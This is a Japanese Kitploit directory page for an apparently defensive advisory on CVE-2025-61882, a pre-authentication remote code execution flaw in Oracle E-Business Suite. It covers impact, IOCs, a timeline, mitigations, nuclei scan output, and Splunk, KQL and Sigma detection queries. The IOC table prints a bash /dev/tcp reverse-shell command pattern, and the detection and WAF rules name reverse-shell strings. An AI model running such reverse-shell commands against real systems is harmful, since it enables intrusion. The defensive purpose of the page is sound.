Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2025-61882 — CVE-2025-61882に関する詳細なアドバイザリを提供します。技術分析、IOC、検出クエリ、およびOracle E-Business Suiteの事前認証RCE向けのnucleiベースのエクスプロイトテンプレートを含みます。 | Kitploit
ツール/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト脅威インテリジェンスインシデントレスポンス
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

CVE-2025-61882に関する詳細なアドバイザリを提供します。技術分析、IOC、検出クエリ、およびOracle E-Business Suiteの事前認証RCE向けのnucleiベースのエクスプロイトテンプレートを含みます。

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️🚨 CVE‑2025‑61882 — Oracle E‑Business Suite (EBS) における重大な事前認証リモートコード実行 🚨🛡️

概要: Oracle E‑Business Suite (EBS) における重大な事前認証リモートコード実行 — 12.2.3 → 12.2.14 に影響、CVSS 9.8、実環境で活発に悪用(ランサム/恐喝活動が報告済み)。([oracle.com][1])


📌 クイックファクト(表)

項目詳細
🆔 CVECVE‑2025‑61882
🧾 製品 / コンポーネントOracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher 統合
📦 影響を受けるバージョン12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ タイプリモートコード実行 (RCE) — 認証不要
🔥 実環境での悪用あり — 大量悪用 / 恐喝キャンペーンが報告済み
📅 開示 / タイムライン2025年10月(ベンダー勧告 + 公開ライトアップ)。([oracle.com][1])

(上記はベンダー勧告、NVD/CISA、および複数のベンダー分析から統合) ([oracle.com][1])


💥 影響(表)

影響領域意味
🔓 機密性攻撃者は機密性の高い人事/財務/ERPデータを読み取ることが可能
🛠️ 完全性攻撃者はレコードを変更、バックドアを作成、または設定を変更可能
⚡ 可用性攻撃者はサービスを妨害、ランサムウェアを実行、またはバックアップを破壊可能
🧭 リスクレベル極めて高い — 重要なERPシステムでの事前認証RCE → 完全なドメインピボットの可能性

高影響の悪用とランサムウェアの関連性を報告する参照情報。([Rapid7][2])


🛠️ 技術概要(簡潔)

  • ベクター: 公開されたEBS WebエンドポイントへのHTTP/HTTPSリクエストが、Concurrent Processing / BI Publisher 統合の脆弱性チェーンをトリガーし、リモートコード実行につながる。([oracle.com][1])
  • 複雑性: 低(認証不要、ユーザー操作不要)。([nvd.nist.gov][3])
  • 観測されたペイロード: リバースシェルパターン、Webシェル、データ窃取と恐喝に使用されるドロップスクリプト。([Rapid7][2])

🕵️‍♀️ 侵害指標 (IOC) — 例(表)

OracleおよびインシデントレスポンダーがIOCを公開。以下は勧告およびベンダーのライトアップで報告された代表的な例です。ログとエンドポイントでこれらのパターンを探してください。([oracle.com][1])

タイプ例
🌐 IP(観測済み)200.107.207.26, 185.181.60.11(報告された例示アドレス)
🧾 コマンドパターンsh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1(リバースシェル)
🗂️ ファイルハッシュ疑わしいエクスプロイトスクリプトのSHA‑256ハッシュ複数件(完全なリストはベンダー勧告を参照)
🕳️ アーティファクト予期しないWebシェル、新しいcronジョブ、異常なIP/ポートへの不審な外部接続

完全なIOCリスト(IP、完全なハッシュ、ファイル名)が必要な場合は、ここに貼り付けます — 「IOCを貼り付け」と言ってください。(リンクなし)


🧭 タイムライン(簡潔)

日付イベント
2025年8月9日実環境での悪用活動が最初に報告される(ベンダーテレメトリ)。([crowdstrike.com][4])
2025年10月初旬OracleがEBS向けセキュリティアラート / パッチの提供を発表。([oracle.com][1])
2025年10月6〜7日CISAが既知の悪用された脆弱性 (KEV) カタログにこのCVEを追加(連邦機関向けガイダンス、緩和措置の期限)。([cisa.gov][5])
2025年10月(継続中)複数のベンダーによるライトアップと大量悪用レポート(CrowdStrike、Rapid7、Tenableなど)。([crowdstrike.com][4])

✅ 推奨される即時対応策(手順表)

優先度アクションメモ / サンプル固有情報
1️⃣ 重大パッチ適用 影響を受けるEBSインスタンスバージョン12.2.3〜12.2.14にOracleのセキュリティアラートパッチを直ちに適用。([oracle.com][1])
2️⃣ 高分離 / 制限 EBS WebエンドポイントへのアクセスEBSへのインターネット公開HTTP/HTTPSをブロック。信頼できる管理者IPまたはVPNのみ許可。
3️⃣ 高WAFルールの有効化/調整エクスプロイトパターンに対するベンダー/コミュニティWAFシグネチャを展開。不審なペイロードをブロック。([Rapid7][2])
4️⃣ 高ハンティング & 検知リバースシェルコマンド、異常なファイル書き込み、IOCへの外部接続をログで検索。
5️⃣ インシデント封じ込め & 対応 侵害が判明した場合ホストを隔離、フォレンジック証拠を保存、認証情報を変更、クリーンなバックアップから再構築。
6️⃣ ポリシー報告 & 通知規制/契約上の要件の対象となる場合、ポリシーに従って利害関係者と当局に通知(CISA/KEVガイダンスが適用される場合あり)。([nvd.nist.gov][3])

💀 エクスプロイト :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ サンプル検知クエリ(コピー&ペースト対応)

Splunk(リバースシェルパターンの検索):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Sigmaルール(概念):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(フィールド名はログスキーマに合わせて調整。IOCを使用して絞り込み。)


🔐 サンプルファイアウォール / WAF緩和策(例)

  • ネットワークACL: パブリックインターネットからEBSサーバーへのインバウンド 80/443 をブロック。管理VPNと特定の管理者IPのみ許可。
  • WAFルール(疑似): POSTボディまたはURLパラメータに bash -i、/dev/tcp/、base64 -d、または典型的なエクスプロイトペイロードパターンを含むリクエストをブロック。
  • レート制限 / 地理的ブロック: ビジネスニーズと整合する場合、EBSエンドポイントへのリクエストを一時的にレート制限し、既知の悪意のある地域からのトラフィックをブロック。

🧾 パッチチェックリスト(クイック)

  1. バックアップとVMイメージのスナップショットを取得 ✅
  2. ステージング環境でパッチをテスト(可能な場合) ✅
  3. EBS 12.2.3〜12.2.14にOracle Security Alertパッチを適用 ✅(ベンダーの手順に従う: サービスの停止、パッチ適用、インストール後タスクの実行)([oracle.com][1])
  4. 再起動してサービスの健全性を検証 ✅
  5. 侵害アーティファクトの再スキャンと完全なホストフォレンジックチェックを実行 ✅

🧠 脅威アクター / エクスプロイトに関するメモ

  • 複数のベンダーが、活発な悪用を恐喝/ランサムウェアに関連するグループ(例: Cl0p / Graceful Spider または関連アクター)に帰属 — データ窃取と恐喝に使用。帰属の確信度はベンダーによって異なる。([crowdstrike.com][4])

📋 SOC / IRチーム向け — プレイブックチェックリスト

  • トリアージ: インバウンドのエクスプロイト試行? HTTPリクエスト、ヘッダー、POSTボディをキャプチャ。
  • 封じ込め: 影響を受けたホストのネットワークを隔離。
  • フォレンジック: メモリ、ディスクイメージ、Webサーバーログ、監査ログを収集。
  • 修復: 侵害が確認された場合、クリーンなイメージからホストを再構築。
  • 復旧: 既知の正常なバックアップから復元。認証情報をローテーション。
  • 報告: インシデントを記録、利害関係者に通知、該当する場合はKEV/CISAガイダンスに準拠。([nvd.nist.gov][3])

🔎 情報源(権威あるレポートの短いリスト)

(正確性のために情報源をリストアップ — ここにリンクは貼りませんが、必要に応じて参照できるようにベンダー/権威機関名を記載します。)

  • Oracle Security Alert / パッチ提供(ベンダー勧告)。([oracle.com][1])
  • NVD / CISA(CISA KEVカタログエントリとNVDメタデータ)。([nvd.nist.gov][3])
  • CrowdStrikeのキャンペーンに関する技術レポート。([crowdstrike.com][4])
  • Rapid7 / Tenable / その他のベンダー分析とFAQ。([Rapid7][2])

CVE‑2025‑61882レポートに使用できるプロフェッショナルで絵文字豊富な免責事項:


⚠️💀 免責事項 💀⚠️

このレポートで提供される情報は、認識、防御、および教育目的のみを意図しています。 この情報を使用して、明示的な許可なくシステムを悪用、攻撃、または侵害することは違法であり、刑事および民事罰につながる可能性があります。

🔒 常に推奨パッチを適用し、セキュリティのベストプラクティスに従い、テストは管理された環境でのみ実施してください。

🧾 このレポートは公式のベンダー勧告に代わるものではありません — 最終的な修復手順については、常にOracle Security Alertsおよび権威あるガイダンスを参照してください。

ツールをダウンロード